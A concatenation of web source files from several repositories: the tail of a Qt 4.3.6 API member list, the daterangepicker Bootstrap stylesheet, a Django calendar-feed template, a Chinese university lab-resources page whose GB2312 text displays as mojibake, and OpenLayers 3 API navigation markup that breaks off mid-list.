</ul></td><td valign="top"><ul>
<li><div class="fn"/><a href="qobject.html#installEventFilter">installEventFilter</a> ( QObject * )</li>
<li><div class="fn"/><a href="qsocketnotifier.html#isEnabled">isEnabled</a> () const : bool</li>
<li><div class="fn"/><a href="qobject.html#isWidgetType">isWidgetType</a> () const : bool</li>
<li><div class="fn"/><a href="qobject.html#killTimer">killTimer</a> ( int )</li>
<li><div class="fn"/><a href="qobject.html#metaObject">metaObject</a> () const : const QMetaObject *</li>
<li><div class="fn"/><a href="qobject.html#moveToThread">moveToThread</a> ( QThread * )</li>
<li><div class="fn"/><a href="qobject.html#objectName-prop">objectName</a> () const : QString</li>
<li><div class="fn"/><a href="qobject.html#parent">parent</a> () const : QObject *</li>
<li><div class="fn"/><a href="qobject.html#property">property</a> ( const char * ) const : QVariant</li>
<li><div class="fn"/><a href="qobject.html#receivers">receivers</a> ( const char * ) const : int</li>
<li><div class="fn"/><a href="qobject.html#removeEventFilter">removeEventFilter</a> ( QObject * )</li>
<li><div class="fn"/><a href="qobject.html#sender">sender</a> () const : QObject *</li>
<li><div class="fn"/><a href="qsocketnotifier.html#setEnabled">setEnabled</a> ( bool )</li>
<li><div class="fn"/><a href="qobject.html#objectName-prop">setObjectName</a> ( const QString & )</li>
<li><div class="fn"/><a href="qobject.html#setParent">setParent</a> ( QObject * )</li>
<li><div class="fn"/><a href="qobject.html#setProperty">setProperty</a> ( const char *, const QVariant & ) : bool</li>
<li><div class="fn"/><a href="qobject.html#signalsBlocked">signalsBlocked</a> () const : bool</li>
<li><div class="fn"/><a href="qsocketnotifier.html#socket">socket</a> () const : int</li>
<li><div class="fn"/><a href="qobject.html#startTimer">startTimer</a> ( int ) : int</li>
<li><div class="fn"/><a href="qobject.html#staticMetaObject-var">staticMetaObject</a> : const QMetaObject</li>
<li><div class="fn"/><a href="qobject.html#staticQtMetaObject-var">staticQtMetaObject</a> : const QMetaObject</li>
<li><div class="fn"/><a href="qobject.html#thread">thread</a> () const : QThread *</li>
<li><div class="fn"/><a href="qobject.html#timerEvent">timerEvent</a> ( QTimerEvent * )</li>
<li><div class="fn"/><a href="qobject.html#tr">tr</a> ( const char *, const char *, int ) : QString</li>
<li><div class="fn"/><a href="qobject.html#trUtf8">trUtf8</a> ( const char *, const char *, int ) : QString</li>
<li><div class="fn"/><a href="qsocketnotifier.html#type">type</a> () const : Type</li>
</ul>
</td></tr>
</table></p>
<p /><address><hr /><div align="center">
<table width="100%" cellspacing="0" border="0"><tr class="address">
<td width="30%">Copyright © 2008 <a href="trolltech.html">Trolltech</a></td>
<td width="40%" align="center"><a href="trademarks.html">Trademarks</a></td>
<td width="30%" align="right"><div align="right">Qt 4.3.6</div></td>
</tr></table></div></address></body>
</html>
|
src/main/webapp/resources/assets/js/date-time/daterangepicker-bs3.css | hedingwei/JavaWebProjectTemplate | /*!
* Stylesheet for the Date Range Picker, for use with Bootstrap 3.x
*
* Copyright 2013 Dan Grossman ( http://www.dangrossman.info )
* Licensed under the Apache License v2.0
* http://www.apache.org/licenses/LICENSE-2.0
*
* Built for http://www.improvely.com
*/
.daterangepicker.dropdown-menu {
max-width: none;
z-index: 3000;
}
.daterangepicker.opensleft .ranges, .daterangepicker.opensleft .calendar {
float: left;
margin: 4px;
}
.daterangepicker.opensright .ranges, .daterangepicker.opensright .calendar {
float: right;
margin: 4px;
}
.daterangepicker .ranges {
width: 160px;
text-align: left;
}
.daterangepicker .ranges .range_inputs>div {
float: left;
}
.daterangepicker .ranges .range_inputs>div:nth-child(2) {
padding-left: 11px;
}
.daterangepicker .calendar {
display: none;
max-width: 270px;
}
.daterangepicker.show-calendar .calendar {
display: block;
}
.daterangepicker .calendar.single .calendar-date {
border: none;
}
.daterangepicker .calendar th, .daterangepicker .calendar td {
font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;
white-space: nowrap;
text-align: center;
/*min-width: 32px;*/
}
.daterangepicker .daterangepicker_start_input label,
.daterangepicker .daterangepicker_end_input label {
color: #333;
display: block;
font-size: 11px;
font-weight: normal;
height: 20px;
line-height: 20px;
margin-bottom: 2px;
text-shadow: #fff 1px 1px 0px;
text-transform: uppercase;
width: 74px;
}
.daterangepicker .ranges input {
font-size: 11px;
}
.daterangepicker .ranges .input-mini {
background-color: #eee;
border: 1px solid #ccc;
border-radius: 4px;
color: #555;
display: block;
font-size: 11px;
height: 30px;
line-height: 30px;
vertical-align: middle;
margin: 0 0 10px 0;
padding: 0 6px;
width: 74px;
}
.daterangepicker .ranges ul {
list-style: none;
margin: 0;
padding: 0;
}
.daterangepicker .ranges li {
font-size: 13px;
background: #f5f5f5;
border: 1px solid #f5f5f5;
color: #08c;
padding: 3px 12px;
margin-bottom: 8px;
-webkit-border-radius: 5px;
-moz-border-radius: 5px;
border-radius: 5px;
cursor: pointer;
}
.daterangepicker .ranges li.active, .daterangepicker .ranges li:hover {
background: #08c;
border: 1px solid #08c;
color: #fff;
}
.daterangepicker .calendar-date {
border: 1px solid #ddd;
padding: 4px;
border-radius: 4px;
background: #fff;
}
.daterangepicker .calendar-time {
text-align: center;
margin: 8px auto 0 auto;
line-height: 30px;
}
.daterangepicker {
position: absolute;
background: #fff;
top: 100px;
left: 20px;
padding: 4px;
margin-top: 1px;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px;
}
.daterangepicker.opensleft:before {
position: absolute;
top: -7px;
right: 9px;
display: inline-block;
border-right: 7px solid transparent;
border-bottom: 7px solid #ccc;
border-left: 7px solid transparent;
border-bottom-color: rgba(0, 0, 0, 0.2);
content: '';
}
.daterangepicker.opensleft:after {
position: absolute;
top: -6px;
right: 10px;
display: inline-block;
border-right: 6px solid transparent;
border-bottom: 6px solid #fff;
border-left: 6px solid transparent;
content: '';
}
.daterangepicker.opensright:before {
position: absolute;
top: -7px;
left: 9px;
display: inline-block;
border-right: 7px solid transparent;
border-bottom: 7px solid #ccc;
border-left: 7px solid transparent;
border-bottom-color: rgba(0, 0, 0, 0.2);
content: '';
}
.daterangepicker.opensright:after {
position: absolute;
top: -6px;
left: 10px;
display: inline-block;
border-right: 6px solid transparent;
border-bottom: 6px solid #fff;
border-left: 6px solid transparent;
content: '';
}
.daterangepicker table {
width: 100%;
margin: 0;
}
.daterangepicker td, .daterangepicker th {
text-align: center;
width: 20px;
height: 20px;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px;
cursor: pointer;
white-space: nowrap;
}
.daterangepicker td.off {
color: #999;
}
.daterangepicker td.disabled {
color: #999;
}
.daterangepicker td.available:hover, .daterangepicker th.available:hover {
background: #eee;
}
.daterangepicker td.in-range {
background: #ebf4f8;
-webkit-border-radius: 0;
-moz-border-radius: 0;
border-radius: 0;
}
.daterangepicker td.active, .daterangepicker td.active:hover {
background-color: #357ebd;
border-color: #3071a9;
color: #fff;
}
.daterangepicker td.week, .daterangepicker th.week {
font-size: 80%;
color: #ccc;
}
.daterangepicker select.monthselect, .daterangepicker select.yearselect {
font-size: 12px;
padding: 1px;
height: auto;
margin: 0;
cursor: default;
}
.daterangepicker select.monthselect {
margin-right: 2%;
width: 56%;
}
.daterangepicker select.yearselect {
width: 40%;
}
.daterangepicker select.hourselect, .daterangepicker select.minuteselect, .daterangepicker select.ampmselect {
width: 50px;
margin-bottom: 0;
}
.daterangepicker_start_input {
float: left;
}
.daterangepicker_end_input {
float: left;
padding-left: 11px
}
.daterangepicker th.month {
width: auto;
}
|
jclub/apps/meetings/templates/calendar.html | fzenke/jclub | {% extends "index.html" %}
<!DOCTYPE html>
{% block title %}{{ block.super }}: Calendar Feed {% endblock %}
{% block content %}
<div class="page-header"><h2>Calendar feed</h2></div>
<div class="row">
<div class="col-md-12">
<p>Please use the following address to access an updated feed of {{ meetings_count }} currently planned and past meetings from other applications.</p>
<p>You should <strong>copy and paste</strong> this into any calendar product that supports the iCal format.</p>
<div class="col-md-6 well well-sm"><h4><a href="{{ cal_url }}">{{ cal_url }}<a></h4>
</div>
</div>
{% endblock %}
|
web_backup/xueke/jiaoxueziyuan.html | airyland/sud | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>½Ìѧ×ÊÔ´</title>
<style type="text/css">
<!--
body {
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
}
.STYLE4 {
font-size: 14px;
font-weight: bold;
}
.STYLE10 {
font-family: "΢ÈíÑźÚ";
font-size: 14px;
font-weight: bold;
text-indent: 1.5em;
color:#000000;
}
.STYLE11 {
width: 130px;
height: 18px;
line-height: 18px;
}
.STYLE11 a{
font-family: "΢ÈíÑźÚ";
font-size: 12px;
color:#555555;
font-weight: 600;
text-indent: 1em;
display: block;
width: 120px;
height: 18px;
line-height: 18px;
}
.STYLE12 {font-family: "΢ÈíÑźÚ"; font-size: 12px; font-weight: bold; }
a:link {
color: #333333;
text-decoration: none;
}
a:visited {
text-decoration: none;
color: #333333;
}
a:hover {
text-decoration: none;
color: #FF0000;
}
a:active {
text-decoration: none;
color: #000000;
}
.STYLE23 a{
color: #555;
font-family: "ËÎÌå";
font-size: 12px;
display: block;
width: 120px;
height: 18px;
font-weight:normal;
}
.STYLE23 a:hover{
color:#FF0000;
}
.STYLE25 {
font-size: 20px;
color: #FFFFFF;
font-family: "΢ÈíÑźÚ";
font-weight: bold;
}
.STYLE27 {font-size: 14px}
.STYLE30 { color: #555;
font-family: "ËÎÌå";
font-size: 12px;
text-indent: 4.7em;
}
.STYLE31 {font-family: "ËÎÌå"}
.STYLE35 { font-size: 14px;
font-family: "ËÎÌå";
text-align: justify;
white-space: normal;
}
.STYLE37 {font-family: "ËÎÌå"; font-size: 16px; font-weight: bold; color: #FFFFFF; }
-->
</style>
</head>
<body>
<table width="1002" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="481"><img src="../../images/zhuye_01.gif" width="481" height="102" /></td>
<td width="356"> </td>
<td><img src="../../images/zhuye_03.gif" width="165" height="102" /></td>
</tr>
</table></td>
</tr>
<tr>
<td><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="1002" height="39">
<param name="movie" value="../../flash/xueke.swf" />
<param name="quality" value="high" />
<embed src="../../flash/xueke.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="1002" height="39"></embed>
</object></td>
</tr>
<tr>
<td height="12"> </td>
</tr>
<tr>
<td><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="157" valign="top"><table width="100%" border="0" cellspacing="4" cellpadding="2">
<tr>
<td height="5"> </td>
</tr>
<tr>
<td align="left" class="STYLE10"> ѧ¿Æ½¨Éè</td>
</tr>
<tr>
<td align="center" class="STYLE11"><a href="xuekejianshe.html"> ѧ¿Æ¼ò½é</a></td>
</tr>
<tr>
<td align="center" class="STYLE11"><a href="xueketese.html"> ѧ¿ÆÌØÉ«</a></td>
</tr>
<tr>
<td align="center" class="STYLE11"><a href="jiaoxueziyuan.html"> ½Ìѧ×ÊÔ´</a></td>
</tr>
</table>
<br /></td>
<td width="54" valign="bottom"><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td> </td>
</tr>
<tr>
<td height="312" valign="bottom" background="../../images/neiye/neiye_03.gif"> </td>
</tr>
</table></td>
<td valign="top" bgcolor="#EA9806"><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td> </td>
<td height="20"> </td>
<td> </td>
</tr>
<tr>
<td bgcolor="#373532"> </td>
<td height="25" bgcolor="#373532"><span class="STYLE25"> ½Ìѧ×ÊÔ´</span></td>
<td width="20" bgcolor="#373532"> </td>
</tr>
<tr>
<td width="20"> </td>
<td valign="top" class="STYLE27"><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height="20"> </td>
</tr>
<tr>
<td><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="100" height="23" align="center" valign="middle" bgcolor="#373532" class="STYLE37">×ÊÁÏÊÒ¼ò½é</td>
<td> </td>
</tr>
</table></td>
</tr>
<tr>
<td height="50" valign="middle" class="STYLE35"> ѧԺ×ÊÁÏÊÒÃæ»ý470 ƽ·½Ã×£¬×ÊÁÏÊÒÏÖÊÕ²Ø×¨ÒµÖÐÎÄͼÊé16135 ²á£¬×¨ÒµÍâÎÄͼÊé 3849 ²á£¬×¨ÒµÖÐÎÄÆÚ¿¯62 ÖÖ£¬×¨ÒµÍâÎÄÆÚ¿¯47 ÖÖ¡£½Ìѧµµ°¸ÊÒÃæ»ý110 ƽ·½Ã×£¬µµ°¸ÊÒ²ØÓÐÀú½ì˶ʿѧλÂÛÎÄ¡¢Ñ§ÉúÊÔ¾í¡¢×÷ҵͼֽ¼°½Ìѧ¹ÜÀíµµ°¸×ÊÁÏ¡£</td>
</tr>
<tr>
<td><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="100" height="23" align="center" valign="middle" bgcolor="#373532" class="STYLE37">ʵÑéÖÐÐÄ</td>
<td> </td>
</tr>
</table></td>
</tr>
<tr>
<td height="50" valign="middle" class="STYLE35"><p align="left"><br />
<br />
³ÇÊÐÉè¼ÆÑ§ÔºÄ¿Ç°ÉèÓжà¸öʵÑéÊÒ£¬ÒÔÂú×ã½ÌѧµÄÐèÒª¡£Ä¿Ç°ÉèÓÐʵÑéÖÐÐÄ£¬¹ÜÀíÈËÔ± 4 ÈË¡£ </p>
<p align="left">1 £© CAD ʵÑéÊÒ </p>
<p align="left"> ѧԺÏÖÓÐ CAD ʵÑéÊÒËĸö£¬¹²ÅäÖüÆËã»ú 160 ̨£¬Í¼Ðι¤×÷Õ¾ 4 ̨£¬ÍøÂç·þÎñÆ÷ 2 ̨£¬»æÍ¼ÒÇ 2 ̨£¬²ÊÉ«¼°ºÚ°×´òÓ¡»ú 3 ̨£¬¼¤¹â´òÓ¡»ú 1 ̨£¬É¨ÃèÒÇ 2 ̨£¬ÍøÂ缯Ïßϵͳ 2 Ì×£¬Ä¿Ç°²»½öʵÏÖ½Ìѧ¥ÄÚ²¿ÁªÍøÊ¹Ó㬶øÇÒÒÑͬѧУ¼ÆËã»úÖÐÐÄÁªÍø¡£ CAD ʵÑéÊÒÓÃÓÚ½¨Öþѧרҵ±¾¿Æ¼°Ñо¿Éú½ÌѧÓë¿ÆÑУ¬ÓÉѧԺ½ÌѧʵÑéÖÐÐļÆËã»ú»ú·¿¸ºÔð¹ÜÀí¡£ </p>
<p align="left">2 £©½¨ÖþÎïÀíʵÑéÊÒ </p>
<p align="left"> ½¨ÖþÎïÀíʵÑéÊÒÃæ»ý 350 ƽ·½Ã×£¬°üÀ¨½¨ÖþÉùѧ¡¢½¨ÖþÈȹ¤Ñ§ºÍ½¨Öþ¹âѧ¼°ÊڿνÌÊÒËIJ¿·Ö£¬²¢½¨ÓÐÉùѧ»ìÏìÊÒ¡¢ÊÜÉùÊÒ¼°ÕûÌ帡Öþ¹¹ÔìµÄ½¨Öþ¸ôÉùÊÒ¡£×ܼÆÍ¶Èë 66.2 ÍòÔªÈËÃñ±Ò£¬¹²¹ºÖÃÏà¹ØÒÇÆ÷É豸 106 ̨ ( ¼þ ) £¬Äܹ»Âú×㽨ÖþÎïÀí±¾¿Æ½Ìѧ¼°Ïà¹Ø¿ÆÑеÄÒªÇó¡£ </p>
<p align="left">3 £©½¨ÖþÓë¹æ»®Ä£ÐÍÖÆ×÷ÊÒ </p>
<p align="left"> ѧԺÉèÓÐרÃŵĽ¨ÖþÓë¹æ»®Ä£ÐÍÖÆ×÷ÊÒ£¬Ãæ»ý 168 ƽ·½Ã×£¬ÅäÖü¤¹âµñ¿Ì»ú¡¢Ð¡ÐÍľ¹¤»ú´²¡¢¼ÆËã»ú¡¢µç¾â¡¢ÅÙ´²¡¢Çиî»úµÈ£¬ÒÔ¼° 10 ÕŽü 8 ƽ·½Ã׵Ť×÷̨£¬¿ÉͬʱÈÝÄÉ 80 ÃûѧÉú½øÐн¨ÖþÄ£ÐÍÖÆ×÷ÊÔÑé¡£Ö±½ÓΪ½Ìѧ¡¢¿ÆÑкÍÉú²úÌṩģÐÍÖÆ×÷·þÎñ¡£¹²Í¶Èë 14 ÍòÔªÈËÃñ±Ò¹ºÖø÷ÖÖÉ豸¼°ÏµÁÐСÐÍÄ£ÐÍÖÆ×÷¹¤¾ß¡£ </p>
<p align="left">4 £©¼¸ºÎ¹¹ÐÍʵÑéÊÒ </p>
<p align="left"> ѧԺÉèÓÐרÃŵļ¸ºÎ¹¹ÐÍʵÑéÊÒ£¬Ãæ»ý 130 ƽ·½Ã×£¬Å䱸¼¤¹âµñ¿Ì»ú¡¢¼Ó¹¤ÖÐÐÄ¡¢¸÷ÖÖÊý¿Ø³µ´²ÒÔ¼°Ò»ÏµÁмӹ¤¹¤¾ß¡£ÎªÄ£ÐÍÖÆ×÷Éè¼Æ¡¢²úÆ·ÔìÐÍÉè¼Æ¡¢ÐÎ̬¹¹³ÉµÈ¼¸ºÎ¹¹ÐÍÉè¼ÆÌṩÊÔÑé½Ìѧ·þÎñ£¬¹²Í¶×Ê 80.6 ÍòÔªÈËÃñ±Ò¡£<br />
<br />
5 £©¿ìËÙ³ÉÐÍʵÑéÊÒ </p>
<p align="left"> ѧԺÉèÓÐרÃŵĿìËÙ³ÉÐÍʵÑéÊÒ£¬Ãæ»ýΪ 56 ƽ·½Ã×£¬ÅäÖÃÈÛÈÚ¼·Ñ¹³ÉÐÎÉ豸¡¢Õæ¿Õ×¢ÐÍ»ú¡¢ÈýάÊý×Ö»¯É¨ÃèÒÇ£¬ÎªÑ§Ôº½¨ÖþÄ£ÐÍÖÆ×÷Éè¼Æ¡¢²úÆ·ÔìÐÍÉè¼Æ¡¢ÐÎ̬¹¹³ÉµÈ·þÎñ£¬¹²Í¶×Ê 14.6 ÍòÔªÈËÃñ±Ò¡£ </p>
<p align="left">6 £©½¨ÖþÉãÓ°ÉãÏñÊÔÑéÊÒ </p>
<p align="left"> ѧԺÉèÓÐרÃŵĽ¨ÖþÉãÓ°ÉãÏñÊÔÑéÊÒ£¬Ãæ»ý 56 ƽ·½Ã×£¬Å䱸ÉãÓ°ÊÒ¡¢°µ·¿ºÍÏàÓ¦É豸²ÄÁÏ£¬ÅäÓÐרҵÉãӰʦ 1 Ãû£¨¼æÖ°£©¡£Ö÷Òª³Ðµ£½¨ÖþѧרҵµÄ½¨ÖþÉãÓ°ÉãÏñÊÔÑé½Ìѧ¹¤×÷¡£¹²Í¶×Ê 13 ÍòÔª¡£ </p>
<p align="left">7 £©ÌÕÒÕʵÑéÊÒ </p>
<p align="left"> ѧԺÉèÓÐרÃŵÄÌÕÒÕʵÑéÊÒ£¬Ãæ»ý 56 ƽ·½Ã×£¬ÅäÖÃÈ¼ÆøÒ¤Â¯¡¢¸ßεçÒ¤¡¢µñËÜת̨¡¢ÀÅ÷»úµÈÉ豸£¬¹²Í¶×Ê 14.8 ÍòÔªÈËÃñ±Ò¡£ </p>
<p align="left">8 £©²âÁ¿ÒÇÆ÷ÊÒ </p>
<p align="left"> ѧԺÉèÓÐרÃŵIJâÁ¿ÒÇÆ÷ʵÑéÊÒ£¬Ãæ»ý 20 ƽ·½Ã×£¬ÅäÖþγÒÇ 15 ̨¡¢Ë®×¼ÒÇ 15 ̨¡£ </p></td>
</tr>
</table></td>
<td> </td>
</tr>
</table></td>
</tr>
<tr>
<td valign="top"><table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td align="right"><input name="textfield" type="text" class="STYLE12" value=" Õ¾ÄÚËÑË÷" size="16" /></td>
<td width="40" height="25" align="center" bgcolor="#EA9806" class="STYLE12"><a href="search.html">GO</a></td>
</tr>
</table></td>
<td valign="bottom" background="../../images/neiye/neiye_03.gif"> </td>
<td align="left" valign="top" bgcolor="#ea9806"> </td>
</tr>
</table></td>
</tr>
<tr>
<td><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="157" height="34" background="../../images/neiye/neiye_07.gif"> </td>
<td width="54"><img src="../../images/neiye/neiye_06.gif" width="54" height="34" /></td>
<td align="right" valign="bottom" background="../../images/neiye/neiye_07.gif"><span class="STYLE4">Î人´óѧ³ÇÊÐÉè¼ÆÑ§Ôº</span></td>
</tr>
</table></td>
</tr>
</table>
</body>
</html>
|
sites/all/libraries/openlayers3/apidoc/ol.layer.Image.html | ps-intelegencia-analytics/testRepo | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>OpenLayers 3 API Reference - Class: Image</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<script src="scripts/jquery.min.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/bootstrap.min.css">
<link type="text/css" rel="stylesheet" href="styles/jaguar.css">
</head>
<body>
<div class="navbar navbar-inverse navbar-fixed-top">
<div class="navbar-inner">
<div class="container">
<a class="brand" href="/"><img src="logo-70x70.png"> OpenLayers 3</a>
<label id="stability">
<input type="checkbox" id="stability-toggle"> Stable Only
</label>
<ul class="nav navbar-nav pull-right">
<li><a href="../doc">Docs</a></li>
<li><a href="../examples">Examples</a></li>
<li><a href="index.html" class="active">API</a></li>
<li><a href="https://github.com/openlayers/ol3">Code</a></li>
</ul>
</div>
</div>
</div>
<div id="wrap" class="clearfix">
<div class="navigation">
<div class="search">
<input id="search" type="text" class="form-control input-sm" placeholder="Search Documentation">
</div>
<ul class="list">
<li class="item" data-name="ol">
<span class="title">
<a href="ol.html">ol</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
<span class="subtitle">Typedefs</span>
<li data-name="ol.CanvasFunctionType" class="unstable">
<a href="ol.html#CanvasFunctionType">CanvasFunctionType</a>
</li>
<li data-name="ol.Color" class="unstable">
<a href="ol.html#Color">Color</a>
</li>
<li data-name="ol.Coordinate" class="">
<a href="ol.html#Coordinate">Coordinate</a>
</li>
<li data-name="ol.CoordinateFormatType" class="">
<a href="ol.html#CoordinateFormatType">CoordinateFormatType</a>
</li>
<li data-name="ol.Extent" class="">
<a href="ol.html#Extent">Extent</a>
</li>
<li data-name="ol.FeatureLoader" class="unstable">
<a href="ol.html#FeatureLoader">FeatureLoader</a>
</li>
<li data-name="ol.FeatureStyleFunction" class="">
<a href="ol.html#FeatureStyleFunction">FeatureStyleFunction</a>
</li>
<li data-name="ol.ImageLoadFunctionType" class="unstable">
<a href="ol.html#ImageLoadFunctionType">ImageLoadFunctionType</a>
</li>
<li data-name="ol.LoadingStrategy" class="unstable">
<a href="ol.html#LoadingStrategy">LoadingStrategy</a>
</li>
<li data-name="ol.OverlayPositioning" class="">
<a href="ol.html#OverlayPositioning">OverlayPositioning</a>
</li>
<li data-name="ol.Pixel" class="">
<a href="ol.html#Pixel">Pixel</a>
</li>
<li data-name="ol.PreRenderFunction" class="unstable">
<a href="ol.html#PreRenderFunction">PreRenderFunction</a>
</li>
<li data-name="ol.RendererType" class="">
<a href="ol.html#RendererType">RendererType</a>
</li>
<li data-name="ol.Size" class="">
<a href="ol.html#Size">Size</a>
</li>
<li data-name="ol.TileCoord" class="unstable">
<a href="ol.html#TileCoord">TileCoord</a>
</li>
<li data-name="ol.TileLoadFunctionType" class="unstable">
<a href="ol.html#TileLoadFunctionType">TileLoadFunctionType</a>
</li>
<li data-name="ol.TileUrlFunctionType" class="unstable">
<a href="ol.html#TileUrlFunctionType">TileUrlFunctionType</a>
</li>
<li data-name="ol.TileVectorLoadFunctionType" class="unstable">
<a href="ol.html#TileVectorLoadFunctionType">TileVectorLoadFunctionType</a>
</li>
<li data-name="ol.TransformFunction" class="">
<a href="ol.html#TransformFunction">TransformFunction</a>
</li>
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.inherits" class="unstable">
<a href="ol.html#inherits">inherits</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.Attribution">
<span class="title">
<a href="ol.Attribution.html">ol.Attribution</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.Attribution#getHTML" class="">
<a href="ol.Attribution.html#getHTML">getHTML</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.Collection">
<span class="title">
<a href="ol.Collection.html">ol.Collection</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.Collection#changed" class="unstable">
<a href="ol.Collection.html#changed">changed</a>
</li>
<li data-name="ol.Collection#clear" class="">
<a href="ol.Collection.html#clear">clear</a>
</li>
<li data-name="ol.Collection#extend" class="">
<a href="ol.Collection.html#extend">extend</a>
</li>
<li data-name="ol.Collection#forEach" class="">
<a href="ol.Collection.html#forEach">forEach</a>
</li>
<li data-name="ol.Collection#get" class="">
<a href="ol.Collection.html#get">get</a>
</li>
<li data-name="ol.Collection#getArray" class="">
<a href="ol.Collection.html#getArray">getArray</a>
</li>
<li data-name="ol.Collection#getKeys" class="">
<a href="ol.Collection.html#getKeys">getKeys</a>
</li>
<li data-name="ol.Collection#getLength" class="">
<a href="ol.Collection.html#getLength">getLength</a>
</li>
<li data-name="ol.Collection#getProperties" class="">
<a href="ol.Collection.html#getProperties">getProperties</a>
</li>
<li data-name="ol.Collection#getRevision" class="unstable">
<a href="ol.Collection.html#getRevision">getRevision</a>
</li>
<li data-name="ol.Collection#insertAt" class="">
<a href="ol.Collection.html#insertAt">insertAt</a>
</li>
<li data-name="ol.Collection#item" class="">
<a href="ol.Collection.html#item">item</a>
</li>
<li data-name="ol.Collection#on" class="">
<a href="ol.Collection.html#on">on</a>
</li>
<li data-name="ol.Collection#once" class="">
<a href="ol.Collection.html#once">once</a>
</li>
<li data-name="ol.Collection#pop" class="">
<a href="ol.Collection.html#pop">pop</a>
</li>
<li data-name="ol.Collection#push" class="">
<a href="ol.Collection.html#push">push</a>
</li>
<li data-name="ol.Collection#remove" class="">
<a href="ol.Collection.html#remove">remove</a>
</li>
<li data-name="ol.Collection#removeAt" class="">
<a href="ol.Collection.html#removeAt">removeAt</a>
</li>
<li data-name="ol.Collection#set" class="">
<a href="ol.Collection.html#set">set</a>
</li>
<li data-name="ol.Collection#setAt" class="">
<a href="ol.Collection.html#setAt">setAt</a>
</li>
<li data-name="ol.Collection#setProperties" class="">
<a href="ol.Collection.html#setProperties">setProperties</a>
</li>
<li data-name="ol.Collection#un" class="">
<a href="ol.Collection.html#un">un</a>
</li>
<li data-name="ol.Collection#unByKey" class="">
<a href="ol.Collection.html#unByKey">unByKey</a>
</li>
<li data-name="ol.Collection#unset" class="">
<a href="ol.Collection.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.CollectionEvent#event:add" class="">
<a href="ol.CollectionEvent.html#event:add">add</a>
</li>
<li data-name="ol.ObjectEvent#event:change:length" class="unstable">
change:length
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
<li data-name="ol.CollectionEvent#event:remove" class="">
<a href="ol.CollectionEvent.html#event:remove">remove</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.CollectionEvent">
<span class="title">
<a href="ol.CollectionEvent.html">ol.CollectionEvent</a>
</span>
<ul class="members itemMembers">
<span class="subtitle">Members</span>
<li data-name="ol.CollectionEvent#element"><a href="ol.CollectionEvent.html#element">element</a></li>
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.DeviceOrientation">
<span class="title">
<a href="ol.DeviceOrientation.html">ol.DeviceOrientation</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.DeviceOrientation#changed" class="unstable">
<a href="ol.DeviceOrientation.html#changed">changed</a>
</li>
<li data-name="ol.DeviceOrientation#get" class="">
<a href="ol.DeviceOrientation.html#get">get</a>
</li>
<li data-name="ol.DeviceOrientation#getAlpha" class="unstable">
<a href="ol.DeviceOrientation.html#getAlpha">getAlpha</a>
</li>
<li data-name="ol.DeviceOrientation#getBeta" class="unstable">
<a href="ol.DeviceOrientation.html#getBeta">getBeta</a>
</li>
<li data-name="ol.DeviceOrientation#getGamma" class="unstable">
<a href="ol.DeviceOrientation.html#getGamma">getGamma</a>
</li>
<li data-name="ol.DeviceOrientation#getHeading" class="unstable">
<a href="ol.DeviceOrientation.html#getHeading">getHeading</a>
</li>
<li data-name="ol.DeviceOrientation#getKeys" class="">
<a href="ol.DeviceOrientation.html#getKeys">getKeys</a>
</li>
<li data-name="ol.DeviceOrientation#getProperties" class="">
<a href="ol.DeviceOrientation.html#getProperties">getProperties</a>
</li>
<li data-name="ol.DeviceOrientation#getRevision" class="unstable">
<a href="ol.DeviceOrientation.html#getRevision">getRevision</a>
</li>
<li data-name="ol.DeviceOrientation#getTracking" class="unstable">
<a href="ol.DeviceOrientation.html#getTracking">getTracking</a>
